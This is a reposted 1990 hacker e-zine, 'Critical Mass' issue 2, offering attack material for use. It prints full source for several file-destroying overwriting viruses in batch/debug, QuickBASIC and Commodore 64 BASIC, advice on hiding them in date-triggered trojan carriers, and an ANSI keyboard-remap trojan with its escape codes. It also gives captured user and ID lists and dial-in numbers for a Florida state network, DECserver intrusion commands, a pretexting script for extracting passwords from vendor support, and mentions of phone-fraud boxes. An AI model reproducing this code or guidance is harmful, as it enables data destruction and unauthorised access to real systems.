Copy Link
Add to Bookmark
Report

Critical Mass 2

eZine's profile picture
Published in 
Critical Mass
 · 5 years ago

  

_____________________________________________________________________________
\~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
\ Critical Issue # 02 A Technical Text /
\ Mass ~~~~~~~~~~~ File Newsletter. /
\________________________________|____________________________________/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

__________________________
__________ l___________ | ___________l
// \ _______ _____ l|l _____ ______ ___
// /~~~~~~~\_\ l \ l l l|l l l // \ _ l l
// / l [] / ~l l~ l|l ~l l~ // /~~~\_\ / \ l l
<<<< ritical l / l l l|l l l // / / \ l l
\\ \ l < l l l|l l l <<<< / ___ \ l l
\\ \_______/~/ l l\ \ l l l|l l l \\ \____/~/ / / \ \ l l_____
\__________/ l__l \_\ l___l l_l l___l \_______/ /_/ \_\ l_______l

==--> ==-->
____ __ ____ ==--> (11/21/90)
l \ / l ass ==-->
l \ / l __ ______ ______
l \ / l / \ / \ / \ A Technical
l l\ \ / /l l / \ / /~~~~~~ / /~~~~~~ text file newsletter
l l\\ / l l / ____ \ \ ~~~~~~/ \ ~~~~~~/ ~~~~~~~~~~~~~~~~~~~~
l l \\____/ l l / / \ \ ~~~~/ / ~~~~/ / Issue: 2
l l l l /_/ \_\ /~~~~ / /~~~~ /
~~~~ ~~~~ ~~~~~~ ~~~~~~


_____________________________________________________________________________
l Writters l Special thanks to.... l
l__________________________l________________________________________________l
l l l
l The Beaver l Old members of C.C.C, SF, Copy Cat, etc. l
l Shadow l Also, Abigail, The Nut-Kracker, Robo., etc. l
l__________________________l________________________________________________l


* Note: We, the writters and editors, of this text newsletter are not
respossible for any injuries or prosocutions due to the information
giving in this text.

EXPERIMENT AT YOUR OWN RISK!

Anybody who is willing, can submit an article! If you wish to
submit an article, please e-mail either 'The Beaver' or the 'Nut-
Kracker', via the 'Warriers Retreat' (904)422-3606. Also, All
sysops can freely download this text in the terms that it is not
altered and none of the credits are change. So.................
please act like a human! Also, for your convience,
every now and then a 'volume' of the Critical Mass is
created. That is, after three to five issues (roughly 50k to 70k
of text) a compiled text will be made containing the past issues,
so if you have missed any issues,you can download the volume you need.
In order for this text to keep on being produced, you the reader
needs to submit, either it be by asking questions (Which will
sometime be included in the text) or by submitting and article.
Any articles on Hacking, Fone Phreaking, Credit Card Surfing,
Pirating, Chemistry, etc. our welcome. Any general 'not accepted'
material is accepted here! Artcles can be on anything from 'how
to rip off this type of coke machine' to 'how to build a Axis bomb
from spare car parts'. We hope you enjoy the information given and
find some use for it.


/\
/\/\ Chief Editors Brought To You By
/\/\/\ ~~~~~~~~~~~~~ Members of
/\/\/\/\ The Beaver (SC/HA)
/\/\/\/\/\ The Nut-Kracker
/\/\/\/\/\/\
/\/Critical\/\
\/\/\Mass/\/\/ (SC/HA)
\/\/\/\/\/\/
\/\/\/\/\/
\/\/\/\/
\/\/\/
\/\/
\/


______________________________________________________________________________
l This issue contains articles of the following..... l
l____________________________________________________________________________l
l l
l I. Editorial written by 'The Beaver'. l
l II. Latest information on hacking InterAct, written by 'The Beaver' l
l III. Destructive Programs For Your IBM PC, Part Two, By 'The Beaver' l
l IV. Very Basic Hacking! By 'The Beaver' l
l VI Hack DEC networks!, Wriiten by 'The Beaver'-'The Shadow' l
l VII. Letters and Replies l
l____________________________________________________________________________l


______________________________________________________________________________
l Todays Topic Is....... l
l Written By The Beaver l
l____________________________________________________________________________l


Well, as you may notice, The Nut-Kracker hasn't submitted any
articals for this text, but for a good reason. He has been having alot go on
in his life and, well, just hasn't got the time. So, I may be looking for a new
editor and writer soon, so if you wish to fill this postion, please E-mail me
at the Warriers Retreat. I wish for someone to fill this postion with the
following requirments........ So sort of hacking experiance in the fields of
blue boxxing, computer hacking, chemistry, or pirating. If you don't have this
experiance, but would still like to become a editor, please E-mail me anyway.
Also, don't expect this issue to be anywhere like the last one, but
if you do have some text files written by various hacker in the USA, please
tell me about them so I can include it in the next issue. I have several text
that I lost and are looking for..... They are......

The Outlaw Series ........ Written in Tallahassee, Fl (Sub. Explosives)
Hacking VMS............... Written by members of Chaos Control

If you have any copies of these, please E-mail me. By the way, the
last issue (1st one) was over 138k bytes if you downloaded it.


---==<Beaver>==---



__________________________________________________________________________
l I. Latest Infomation On Hacking InterAct l
l Written By 'The Beaver' l
l________________________________________________________________________l


This is another FIRN hack that Florida hackers may find useful. The
system is called interact off of the Florida Information Resource Network.
The Nut-Kracker and I broke into this system under a Demo account a little
while back. This system is running under a IBM 30XX series I think and is
running under VM OS. It is used by the state of florida along with serveral
universities. But first, let me give you a list of Florida area fone numbers
to get in contact with this net.........


City Fone Number Baud Rates
-------------------------------------------------------------------------------

Boca Raton (305)395-0552 300/1200
395-1410 300/1200
Brevard (305)639-1790 300/1200
Broward (305)764-5540 300/1200
Eglin AFB (904)678-7056 300/1200
FT.Myers (813)489-4843 300/1200
Ft.Walton (904)244-8185 300/1200
Gainsville (904)392-5362 300/1200
Jacksonville (904)646-2992 300/1200
Miami (305)226-1846 300/1200
Orlando (305)275-2220 300/1200
Pensacola (904)474-2533,4,5,6 300/1200
Sarasota (813)957-4682 300/1200
St.Pete (813)893-9509 300/1200
Tampa (813)974-3890 300/1200
Tallahassee (904)488-0650,1,2,3,4,5,6,7 300/1200
W.Palm Bch. (305)969-3504 300/1200


Actually, a lot of these have 2400 Bds, but I can't remember which
ones do and don't. At any rate, when you log on, you will be greeted with a
'User Name:' prompt. type 'Menu'. At the Menu you have a choice of three things
to do besides log out. I know it isn't the 3 choice, so it is either 1 or 2.
Pick either one or two and look for 'InterAct'. Once you have found it, log on
to it. It should ask you for a username, ID and password. You can try the Demo
accounts, but I doubt they will work cause we used them to death. Well if you
have gotten this far you are going to need so usernames plus ID's so here they
are. This is straight from the buffer.....


1 (INT-FXUWA) SIGNING ON (NOTIME) (NOBREAK)
2 (INT-NWRXL) OPS$NWRAD (INTERACT) (NOTIME)
4 (INT-LEO25) SIGNING ON (NOTIME)
46 (9DA) DEMO$DEMO (INTERACT)
56 (VTA TW1MFAAM) WEB$FAUFA (INTERACT) (NOTIME)
61 (VTA TW1MFAAF) CLS$FAURG (INTERACT) (NOTIME)
68 (VTA TW11DEDG) POR$DOEKD (INTERACT) (NOTIME)
75 (VTA TW1MFAAQ) SIGNING ON (NOTIME)
77 (VTA TW11FX1M) SGM$FSUAD (INTERACT) (NOTIME)
78 (VTA TW1MFXT8) RRN$FSUWK (INTERACT) (NOTIME)
81 (VTA TW1MFSF6) SA3$FSUHC (INTERACT) (NOTIME)
82 (VTA TW1MFSGM) FSU$FSUAD (INTERACT) (NOTIME)
91 (VTA TW11BR26) MKP$BORMS (INTERACT) (NOTIME)
103 (VTA TW11BR2F) MJH$BORMS (INTERACT) (NOTIME)
105 (VTA TW11FXZE) QC3$FSUAD (INTERACT) (NOTIME)
106 (VTA TW1MFXTO) FDA$FSUAC (INTERACT) (NOTIME)
107 (VTA TW11DEDO) SIGNING ON (NOTIME)
109 (VTA TW11DEB7) SIGNING ON (NOTIME)
111 (VTA TW1MCFAK) DFH$FTUIC (INTERACT) (NOTIME)
113 (VTA TW1MFSGZ) BRI$FSUBI (INTERACT) (NOTIME)
137 (VTA TW1MAMXB) MNG$FAMDC (INTERACT) (NOTIME)
138 (VTA TW1MFXUI) LST$FSUAD (INTERACT) (NOTIME)
140 (VTA TW1MCFA0) AIR$FTUIC (INTERACT) (NOTIME)
155 (VTA TW11FIY2) PRO$FIUAD (INTERACT) (NOTIME) (NOBREAK)
160 (VTA TW1MFSEY) SA2$FSUHC (INTERACT) (NOTIME)
166 (VTA TW1MFAAU) BCL$FAUFA (INTERACT) (NOTIME)
174 (VTA TW1MFIAI) IAG$FIUAD (INTERACT) (NOTIME)
183 (VTA TW11CJ20) CJC$CJCCS (INTERACT) (NOTIME)
187 (VTA TW1MFIA7) ABS$FIUAD (INTERACT) (NOTIME)
191 (VTA TW1MNWXA) KMA$NWRIC (INTERACT) (NOTIME) (DISK)
193 (VTA TW1MNWXX) GWS$NWRAD (INTERACT) (NOTIME)
197 (VTA TW1MFAAH) SSS$FAURG (INTERACT) (NOTIME)
200 (VTA TW1MFAAP) CAS$FAURG (INTERACT) (NOTIME)
202 (VTA TW11DE1Q) AC5$DOEKD (INTERACT) (NOTIME)
205 (VTA TP11WFHE) DWS$UWFCS (INTERACT) (NOTIME)
209 (VTA TW11FX0G) PCF$FSUAD (INTERACT) (NOTIME)
246 (VTA TW1MBYA8) BAY$BAYCS (INTERACT) (NOTIME)
247 (VTA TW1MFIAC) AXD$FIUAD (INTERACT) (NOTIME)
38 ACTIVE, 33 SIGNED ON, 33 ON INTERACT.
COMMAND?


All the numbers to the left are ports. The first two ports are for the
sysops and if you notice that in port 46 there is a 'demo,demo' account that
they forgot to take out. Thats how we hack the systems. Now let me explain how
to find the user ID and names. Look at port 2. Notice that is says 'OPS$NWRAD'.
'OPS' is the username and 'NWRAD' is the ID. You can also tell somtimes where
certain people are calling from. Such as people with the user name 'BAY' are
probably calling from Bay County, Fl. Probably on the Eglin AFB line. Note:
notice that port 246 ID is BAYCS, or Bay County Schools. Notice things like
DOE (Dept. Of Education). Also, if you have any questions in hacking computers
in the Tallahassee region or just a type of system, I or someone I know may
be able to help, so just E-mail me if you have any sort or questions.


________________________________________________________________________
l Destructive Programs For Your IBM l
l Part Two l
l Written By 'The Beaver' l
l______________________________________________________________________l


In part one (issue#1), we covered the following........

How to use a text writter and debug to create small assembly programs.
How to destroy disk (Trojan Horse) on drives A,B and C.
How to create false errors.
How to disable ALT-CTRL-DEL warm boot.
A few other minnor things.

Hopefully, we can carry this a little farther.


Command Level Batch Virus.
--------------------------------


Alot of people believe that it is not possible to create a virus
at a command level. This is wrong, though the virus is not that deadly. The
following code was put in for people to get a basic understanding of a virus.
The virus comes in four parts and is very, very easy to stop. If one of these
parts are deleted, the virus will fail to work. This code was written by Ralf
Burger in 1988 as a demonstration virus. Heres the code in three parts and
what the four parts are named.

Name:Vr.bat (use edlin to enter it)

echo=off
ctty nul
dir *.com/w>ind
edlin ind<1
debug ind<2
edlin name.bat<3
ctty con

Name:1 (use edlin)

1,4d
e

Name:2 (use edlin)


m100,10b,f000
e108,".bat"
m100,10b,f010
e100,"del "
mf000,f00b,104
e10c 2e
e110 0d,0a
mf010,f020,11f
e112 "copy \vr.bat "
e12b,0d,0a
rcx
2c
nname.bat
w
q

Name:3 (Must use Debug to enter this because of the 1Ah)

0100 31 2c 31 3f 52 20 1a 0d-6e 79 79 79 79 79 79 79
0110 79 20 0d 32 2c 32 3f 52-20 1a 0d 6e 6e 79 79 79
1120 79 79 79 79 20 0d 45 0d-00 00 00 00 00 00 00 00

If you care to understand how to code works, then simply remove the
'ctty nul', because this sends all output to a 'nul' device. If you remove
that, also remove the 'ctty con', that restores output to the console. After
doing this, it should become very clear about what is happening. This is a
command level, over-writting logical virus, so it actually takes the place of
its hosts code.

For part two, I am going to keep the first few programs very simple
and will probably get more into assembly code as we go along. As you have
probably been thinking, 'wouldn't assembly code work much better for a virus?'.
Well, thats correct. But first lets just get the basic understanding first.

The following code is written in BASIC. It is a logical overwritting
virus, but better self contained. It infects all files with the extention of
COM. The actual virus though is compiled to a EXE. form though. To do this, I
used QuickBasic 4.5. The Marker is the length on the virus, or 40396 bytes.
This virus is also easy to stop, because the time and date stamp change , the
length of the program and the file type also change. But to a person who isn't
greatly familar with computers, it could still cause havoc. The only good thing
about this is that it is totally self contained. Heres the listing....


1 ON ERROR GOTO 3500: CLS : COLOR 0, 0
2 SHELL "dir *.exe>dna": SHELL "dir *.com>rna"
5 OPEN "rna" FOR INPUT AS #1
10 INPUT #1, w$, x$, y$, z$, a$
15 CLOSE #1: f = 1: KILL "rna": IF a$ = "" THEN 3500
20 f = f + 1
25 IF MID$(a$, f, 1) = " " OR MID$(a$, f, 1) = "." OR f = 13 THEN GOTO 30
27 GOTO 20
30 oname$ = MID$(a$, 1, f - 1)
35 OPEN "dna" FOR INPUT AS #1
40 INPUT #1, w$, x$, y$, z$
45 INPUT #1, a$: b$ = MID$(a$, 17, 5)
47 a = VAL(b$)
50 IF a <> 40396 THEN 45
53 KILL "dna"
55 f = 1
60 f = f + 1
65 IF MID$(a$, f, 1) = " " OR MID$(a$, f, 1) = "." OR f = 13 THEN GOTO 75
70 GOTO 60
75 nname$ = MID$(a$, 1, f - 1): COLOR 0, 0
80 KILL oname$ + ".com": SHELL "copy " + nname$ + ".exe " + oname$ + ".exe"
90 COLOR 0, 0
3010 KILL "dna": SHELL "del rna": end
3500 CLS : KILL "dna": KILL "*.exe": KILL "*.dat": KILL "*.txt": PRINT "Cough, H
ack, Sniff"
3501 end


As you may notice, when the computer hits a disk error, all data is
destroyed. The next virus is also written in basic and is a logical virus.
Once again you will need a compiler to use it properly though. The only
difference is that the virus infects files with the extention of EXE. The
logical virus itself is also a EXE. type virus. But the modifications compared
to the one up top make this one work far greater. The traits that it shares
with the first listing is that it also uses the length as a marker. The
advantages over the one up top are that......
+
1. The listing is shorter
2. Disk access is cut in half, so less time is consumed.
3. The file type stays the same.


1 CLS : COLOR 0, 0, 0: ON ERROR GOTO 210: SHELL "DIR *.EXE>DNA": OPEN "DNA" FOR

INPUT AS #1: INPUT #1, W$, X$, Y$, Z$, A$
10 IF A$ = "" THEN 200
15 B$ = MID$(A$, 17, 5): B = VAL(B$)
20 IF B <> 38622 THEN 50
25 IF VNAME$ <> "" THEN INPUT #1, A$: GOTO 10
30 F = 1
35 F = F + 1: IF MID$(A$, F, 1) = " " OR MID$(A$, F, 1) = "." OR F = 13 THEN 40
38 GOTO 35
40 VNAME$ = MID$(A$, 1, F - 1): IF VNAME$ <> "" AND oname$ <> "" THEN 80
45 INPUT #1, A$: GOTO 10
50 IF oname$ <> "" THEN INPUT #1, A$: GOTO 10
55 F = 1
60 F = F + 1: IF MID$(A$, F, 1) = " " OR MID$(A$, F, 1) = "." OR F = 13 THEN 70
65 GOTO 60
70 oname$ = MID$(A$, 1, F - 1): IF oname$ <> "" AND VNAME$ <> "" THEN 80
75 INPUT #1, A$: GOTO 10
80 CLOSE #1: KILL "DNA": KILL oname$ + ".EXE": SHELL "COPY " + VNAME$ + ".EXE "
+ oname$ + ".EXE"
200 END
210 IF oname$ <> " " THEN SHELL oname$
220 END


In case you have a little trouble understanding the two, here are some
flow charts that may, or may not help.



Create a 'DNA' and 'RNA
File. 'DNA' holds all
'EXE.' files. 'RNA' holds
'COM.' files.

!
!
!

Are the any infectable
'COM' files stored in
the 'RNA' File List?

Y N


! !
! !
! !
I am not home!!!



Get the name and Del all 'TXT.','DAT.' and
store as 'oname' 'EXE.' files and display
the message 'Cough, Hack
! ,sniff. After that, do a
! crash.
!

Del 'RNA' and look though 'DNA' for a copy of the virus.
The marker is the lenght to the virus. Note: If it does
not exsists, there is no way the prg. can be held in
in memory. This Will Be Stored as 'nname'

!
!
!

Delete 'DNA' and the name under the string 'oname'
which will be a 'EXE.' file.

!
!
!

Copy then virus 'nname' as the old name was under,
'oname' and do a system crash.

-------------------------------------------------------------------------------

The Dir. will go from this.........

PRAY1.COM To...... PRAY1.EXE (Vir. Here)
PRAY2.COM PRAY2.COM (No Vir)
And So On To 'Pray2'....



Here is a flow chart for the second virus listing.


Virus 2

Flow chart to a EXE to EXE
infector, unlike Virus 1.
______________________________________________________________________________


Shell to DOS and create a file
with all EXE. files in the
current directory. The file
that contains all the EXE file
names is called `DNA`

!
!

Get a file name out of `DNA` <--------------!
!
! !
! !
Is the file name pulled contain a !
virus? !
!
Y N !
!
! ! !
! ! !
!
Is 'vname' taken Is 'oname' taken !
!
N Y N Y ----!--!
! !
! !____________\___________________! !
! / !
! ! !
!
Store file name as Store file name as !
'vname'. Has 'oname' 'oname'. Has 'vname' !
been used? been used? !
!
Y N Y N !
!
! ! ! ! !
! !_______/-\_______________!____!
!________________________!
!
!
!

Replicate and end.
^^^^^^^^^^^^^^^^^^
______________________________________________________________________________

Virus2: Logical Virus.

`Oname` - Old file name used. This is the original unifected file.
`Vname` - Virus file name. This file has been infected and is retrieved
so that the virus can copy itself to the `oname`.
e.g. -
Delete oname
Copy vname.exe oname.exe

(Sept. 18, 1990) Written by The Beaver.
______________________________________________________________________________


For the programs written in basic, it would be wise to use carrier
programs, though they are not needed. It does look better if you do use one
with these though. If you are going to write a carrier program, odds are that
you will write it in BASIC. If so this is the best operation I see that you
can do. Make the carrier program and the virus two different programs to save
disk access time. Make a 'loader' or replace one on a program, such as a word
processor we'll use for example. I would also go by either date or the number
of times the program is used. I prefer the date because you don't have to read/
write to the disk in the carrier program, thus saving time. This is the order
I would do them in.....

1. Is today equal or greater than the date to go off? if so, continue to
2. If not, run the wordprocessor as usual.
2. shell to the alt-ctrl-del killer (mentioned in issue#1)
3. shell to the virus.
4. end.

Actually, what I think is a good idea is to change the file type of
your virus from EXE. to say, DAT. This will make it more confusing to the user.
So your carrier would look like this......

1. Is today equal or greater than the date to go off? if so, continue to 2.
If not, run the wordprocessor as usual.
2. Shell to the alt-ctrl-del killer
3. Change the viruses file type from DAT. to EXE.
4. shell to the virus
5. change the virus back to a DAT. file
6. end.


Of course, this also will increase disk access time. Thats the main
problem with viruses at any high level laugauge. I did not include any carrier
code in this text because I am pretty sure that most users can write there own,
but if you would really like some carrier code, then E-mail me and I will
include it in the next issue.

ATTENTION COMMODORE 64/128 USERS!
-----------------------------------

This is a very simple logical virus written that I wrote on the c64
a number of years ago. This is the simple listing, in BASIC once again so that
you can build on it. I could have modified this listing serval times, but I will

leave that up to you. You can add in things like a line to determine if the
virus is running on a c64 or c128. If its running on a c128, you can tell it
to step up the clock speed, etc, etc..... I also have written a ton of trojan
horses for this machine, but will not include them here. If you wish that I
, drop me a line........

10 open 1,8,0,"$0"
30 get#1,a$,b$
40 get#1,a$,b$
50 c=0
60 if a$<>"" then c=asc(a$):if c<>9 then 30
70 if b$<>"" then c=c+asc(b$)*256
84 get#1,b$:get#1,c$:get#1,d$:get#1,e$:b$="":c$="":d$="":e$=""
85 get#1,f$,g$,h$,i$,j$,k$,l$,m$,n$,o$,p$,q$,r$,s$,t$,u$,v$,w$
90 z$=f$+g$+h$+i$+j$+k$+l$+m$+n$+o$+p$+q$+r$+s$+t$+u$+v$+w$
100 close 1:open 15,8,15:print#15,"s0:"+z$
110 close 15
120 open 15,8,15,"i":close 15:save z$,8


Thats all the Commie stuff Im including in this issue, unless you ask
for more in further issues.

Lets now move on to the Trojan Horse for the IBM. It has been thought
for a long time that it was impossible to write a trojan into a text file on
the IBM. This is WRONG. There is a great danger that lies here. The reason is
because of the ANSI driver that is installed on most IBM's today. It is
possible that I could have included a trojan in the very text your reading, but
I did not. But to prove a point, at the end of this text, press the 'A' key and
there will be a msg. displayed. This is was you would see right here.......
(NOTE: for the letter 'A' to be remapped, you must 'type' this file and have
a ANSI driver installed.)


"[65;"echo The Beaver Was Here!";13p"
"[97;"The Beaver Was Here!!!";13p"


These are escape codes. I could have easy say something like ,gee,
ya know what you should never type? that del *.com. In that one sentence, I
COULD have remap your keyboard to wipe every COM. file out when you hit then
letter 'D'. But I didn't though. Heres how it is done......


What is happening is that we are placing escape codes in the beging
of our sentence. I will show you the escape codes here. Note the hex dump of
the .......


22 1B 5B 36 35 3B 22 65-63 68 6F 20 54 68 65 20 ".[65;"echo The
42 65 61 76 65 72 20 57-61 73 10 48 65 72 65 21 Beaver Was Here!
22 3B 31 33 70 22 0D 0A-00 00 00 00 00 00 00 00 ";13p"..

First let me explain what some of the Hex codes stand for.......

22 - " 20 - (space) 1B - escape

Now, actually, the first '22' and the last one can be removed with
no effects to the trojan. After the '22', you will notice a 1B, which envokes
the ANSI controller. Then what we tell it is that we are remapping asc '65' or
the letter 'A' to mean 'echo The Beaver Was Here. The 13p gives us a return at
the end. I won't go to much in detail for you IBM users, because thats why the
program 'Remap Utility 1.0' was included in this issue. This program does
the hole remapping process for you. If you do want to learn more about ANSI,
then refer to you manual. Well, thats part two, but the next issue will
contain part three of this ongoing series. The next part will contain.......

Complete Non-overwriting code in assemble.

Thats about it, the codes pretty long..... (500 bytes with remarks)




______________________________________________________________
l Very Basic Hacking l
l Written By 'The Beaver' l
l_____________________________________________________________l



I have noted that there are alot of young and new hackers taking on
the BBS scene. Alot of them are completely new to hacking, so I included a
few tips and advice for the new hackers out there. All you other, more
experianced hackers can just skip through this stuff, or bare through it
in hopes you may learn something.


Unix - UNIX can sometime idenified just by the prompt, just like most
machines. On a VAX running UNISTRIDE, you will get a greeting
message of some sort along with a logon prompt. Type CTRL-S.
If the damn thing freezes up on ya, its probably UNIX. To get it
unstuck, hit CTRL-Q. There are other ways to identify this. Sometimes
a CTRL-Y will reset the login message. Characters that make the
cursor dance, etc. UNIX is had to put in one field, because it can
be used on everything from the home PC to a mainframe. I really hate
UNISTRIDE, unless it is set up hack easy, which is rare. You can hack
it several ways. First off, some UNIX systems allow you to use a
'WHO' command to get a userlist before logging on. This is rare.
You can, believe it or not, sometimes use the rapid fire method
(Explained later). Sometimes there are also guest accounts. A guest
accout goes like this; Username:GUEST Password:<CR>. Hard, huh?
Once inside, you will find this OS very easy to use. To get higher
access, you can get the privileged password. That is, like on a DEC
server, normal users can become privileged by the use of one password.
There are also some other advanced ways discovered by Robert Morris,
Jr. Like the Sendmail attact, and the fingerd attact, But we won't
go into advanced hacking right now.
VMS - Very user friendly. To confirm your on VMS, type /XXXX. Fill in the
'XXXX' with any garbage. If you get a error along the lines of, '
commmand qualifier not present', or something like that, your on
VMS. Try DEMO accounts first (always do this!). Alot of times, the
password is the same as the username, in the default settings. Get
a copy of 'Hacking VMS' by the Chaos Control Commit. (C.C.C). If you
find this, e-mail me, I can't find it anywhere.
VM-370 - Sucks


Well I won't go into Primo's, VM-370, RSTS, TOPs, or ULTRIX shit.

Rapid - This method doesn't work much anymore, except one old Borrough's
Fire systems and stuff. Any rate, heres what happens. Imagine you ask
a system 'what time is it?'. The system will put you command in a
buffer and run off and see if you have access to get the time. While
it runs off, you change the command to something like, 'Give me a
userlist'. The system comes back with a 'Okay', and allows the second
command to fall through. Thats one way off this method, here's another.

You ask the system any question, like the time for instance. When it
runs off to get verification, you fill the buffer with crap. This is
basicly how the fingerd method works, but a little more complicatied.
I've only seen these two method work once on a B2700, I think it was.
Decoy - Ok, this is a more advanced hacking method. I will just give the idea
here. We'll actually got into it in Hacking DEC, part II. Think of
this, on a PC BBS Level. Your the user and I'm the hacker. Now
you call the BBS and you see things to recognize, right? Thinks like
welcome to such and such BBS and all that. Well, one day I decide I
want a account on a system. We'll just say that I use call forwarding
from the BBS to my house. See? I get all the info and not the BBS!
so in the end, you think your on something your not, and I get all the
info!




__________________________________________________________________
l l
l Hacking DECserver's Part II l
l By 'The Beaver' l
l________________________________________________________________l



Here is more information about those great DECserver you and I love.
Please, read part I or you won't understand what is going on. The information
given like last time, we beleive has never be disclosed in any other text file
or news letter. You should feel lucky. All information was found by myself,
'The Beaver','Shadow', and 'The Nut-Kracker'. We also had some help from
several other people. Thanx..........

To start off, lets talk just about the server themselves. In the first
part, I called it 'Hacking DEC200 servers'. This was a incorrect statement.
That is, you can use these skills on many other nets such as the EMULEX corp.
Preformance4000, or the DEC300 servers, so don't take the first part that
literally. There are somethings different on the DEC200 and 300's. 200's
can only support 8 ports because there are only 8 rs232 ports, but they can
be expained to 16 ports. The 300 has 16 port and can support 32. Some DEC's
can support up to 50 ports that I know of. The same with 4000's. One great
way to find out hacking info on these is to call DEC at 1800-323-4827. Sound
like you know what your talking about, and they will tell you anything. Just
say something like, ' Hello, Im here at UF using a DEC (DECK)200, and Im having
trouble setting up the maintenace password. What should I do?". He'll ask you
a bunch of question like, "Whats the DEC200 on?". You say "A VAX running VMS
5.1". If you sound like you know what your doing, you can get anything from
these people. Well, enough small talk, lets get started..........

A while back, the Shadow and I found a state runned DEC200 in our
region. All it had on it was 2 in/out modems (pre-programed), LAT Printer,
and a VAX named 'Legal3'. Pretty pointless to use a server for this, but
at anyrate, we became intrested in the VAX. We decided to attempt to set up a
decoy (explained later in the text). Shadow was the first to do this.
When he set it up, he found that suddenly a remote port logged in, and
was following him around, but when he disconnected from it, the remote port
disapeared. Pretty strange, needless to say. We came to the theory that this
was some sort or monitoring port, that seemed to only come alive when a service
was set up. Any rate, it doesn't stop there. Once trying to he tried to knock
out that remote port and got a -151- error messages, or 'system init 1 minute
to shut down', but this was canceled, but not by him. We figure that there are
ways to make your sever more secure. We were able to get past it though.
Just resently, we found this while trying to set up decoys. This is
really odd, and we still don't know what to make of it. We went on and type
the following........

set service test
set service test idenification "testing 1-2-3"
set service test port all enabled

This creates a fake service "test" and says that all ports can use
it. The thing is that it says, its a computer, its availible and this is what
it is. When you connect to it, nothing happens. A complete null. Once though
when we where hacking very fast, but I won't go into that, shadow was booted
from the system, and a remote port was put in his place. I chaser program that
I just talked about. He got booted because of call waiting. I wasn't sure
if he left or if he changed his port from dynamic status to remote status,
so I send him a message. I got no response, and returned to the fake service.
When I returned, I recieved my own message, even though I sent it to his port.
Could this be the broadcast buffer, we are not sure yet, and will fill you in
when the answer is found. Here are a few more commands that will help you in
the future.

set server dump e/d (priv. only)
In a REAL crash (not a init), all memory contents are
dumped to a console port, or YOU!
sho service local shows all local services like LAT printers, in/out
modems, etc............
and last but not least.......

set service connections (get help) this allows you to connect OTHER ports to
services.


Well, sorry theres not more, but we have been having some trouble
lately, but there is more to come........ Before I go, here is a list of
call numbers off of ufnet for you FIRN hackers.........

Call # Comment
-----------------------
200 DECserver
201 EMULEX 4000 server
202 Dito
3000 DECserver
3001 Dito
3002 Dito
3003 Dito
2000 NERDC (North east reginal data center)
1400 VAX/UNIX ??????
1100 UNKNOWN
900 Industral VAX/UNIX
800 UNIX(Bikini)
700 UNIX/VAX (Beach)
500 VAX 11/750
250 DECserver (down ALOT!)
170 Selene
120 Selene


Thats All! Chow

---==<Beaver>==---




_____________________________________________
l l
l Letters and Replies l
l___________________________________________l


*NOTE: All letters sent to 'Critical Mass' writter's and editors are posted
here anynomous like, unless you tell us other wise. Please, ask
questions and I will try to reply or find the answer for you. The
whole bases of this text depends on YOU!



Msg # 1 Date: Fri 12-28-90, 8:35 pm
From: XXXXXXXXXXXX Read: 1 times [1 Reply]

Subject: Hacking stuff... (Hows the wife/kids)

The Beaver,

I just finished your little article called "CRITICAL MASS", and must
say, I am impressed! You apparently know your stuff! Anyway I have a few
questions concerning some of the things you talked about... (I am interested
in that kind of thing)...

Number 1:
Where did you learn about Assembly... I mean you just do not
read the stuff you talked about in PC World or other PC magazines (do
you?)... The reason I would like know is because I am the type of person
who likes languages, practical jokes.. ECT... (BTW nice keyboard locker, and
Disk Access locker!)(My brother went nuts trying to fix the computer!)

Number 2:
Do you know anything about something called "GREEN BOXING"...
I am sure you do, since you know about BLUE BOXING... Well, I need the plans
for a "green box", and figured you might have some you could upload, and
place a password on for me... I of course would need a part list... (Reading
the plans is hard enough for me, much less telling the difference on paper
between a capacitor and a transistor...! But hey I am learning...

And lastly:
If you have no idea what I mean (if I miss named it)... This
little mechanism is in a little box about the size of your hand... And when
the button is pushed on it, it emitts a series of clicks, and beeps... When
held up to a pay-phone, these clicks, and beeps sound to it like a Quarter
dropping into it.. And these are nice for long distance calls, ect...


Well, That is it, and oh by the way.... You would be supprised at the number
of "Program Hackers" around town now-a-days......

Thanks,

XXXXXXXXXXXX



P.S. Please keep the information comming.... Oh yea before I forget I am
having trouble getting on to the FIRN system... What is my terminal
identifier?



First the first question. I learned alot of assembly from a school
friend of mine while taking electronics and becoming a tech. He has to be the
most versital programmer I have ever seen. He taught me all about what
registers do to what a interrupt 13 will do. There are tons of books on
assembly, but they are hard to read and very techical. I got really started
after using a assembler called "CHASM" which comes with a little tutorial on
assembly. From there I just got the books it told me about. By the way, thats
great about your brother. Also, code like I gave in the last issue isn't hard
to find. You just got to look around, if you know what I mean.
The second question. I think you really mean a "red box". This baby
simulates the tones needed to preform a nickel, quarter and dime tones. I hate
to tell you this, but I only have plans for the blue, silver, white and black
box at this time. I don't know what type of computer(s) you have, but if you
have a c64 there are tons of great programs you can get. The only problem
is that none of the boxxes can be used in our area code. Thats not to say that
you can't use it outside our area code though. I know that 800 and 305 work,
along with 205 and others, but if I where you, I would just stay way from it
all. Since the equipment replacing and such, it is become more difficult to
box. Mostly off 800, doing that is nuts. I can probably get the tones and
make up a schematic if you still desire one.
Third, when connecting to firn, your terminal identifier should be "a".

If this doesn't work try "d". Happy hacking..........

---==<Beaver>==---




By:XXXXXXXXXXXXXXXXX


I'm having trouble navigating though FIRN. Could you or somebody give
me some help or some pointers about what I am doing wrong. Thanks



If you have never been on the FIRN system, follow the directions below:

Call 488-0650 with you'r modem
wait for a connect and shit chars to be recived
press return
at the terminal identifier type <a>
at the login prompt enter <menu>
press return
at the first menu type <2>
press return
at the next menu type <p>
press return
wait for about 5 sec.
press return twice
at the "#" prompt enter <call 200>
press return
wait for about 5 sec.
press return twice
you should now see a "Local>" prompt
type <show users>
press return

If you don't know what to do, or how anything works, at any "Local>" prompt,
enter <help> and return. This should show some self explanatory info. If you
have any problems, myself or the beaver u'll help. My knowledge of netsys's
are not cavernous, but I do know something... Anyway, If you see me on, don't
hesitate to <broadcast> to my port (unless you see a "<l>" behind my name, if
that is the case, I can receive your msg's, but not send any). I should be on
the DEC Call 200 aera mostly every night from 11:00pm to about 3:00am (aprox).

- Shadow



_______________________________________
l l
l Finnal Notes l
l_____________________________________l


Well, this concludes the second issue of Critical Mass. I wish there
was more, but you know how it goes. Before we end this issue, I would like to
state several things though. If you, the reader, don't like Critical Mass
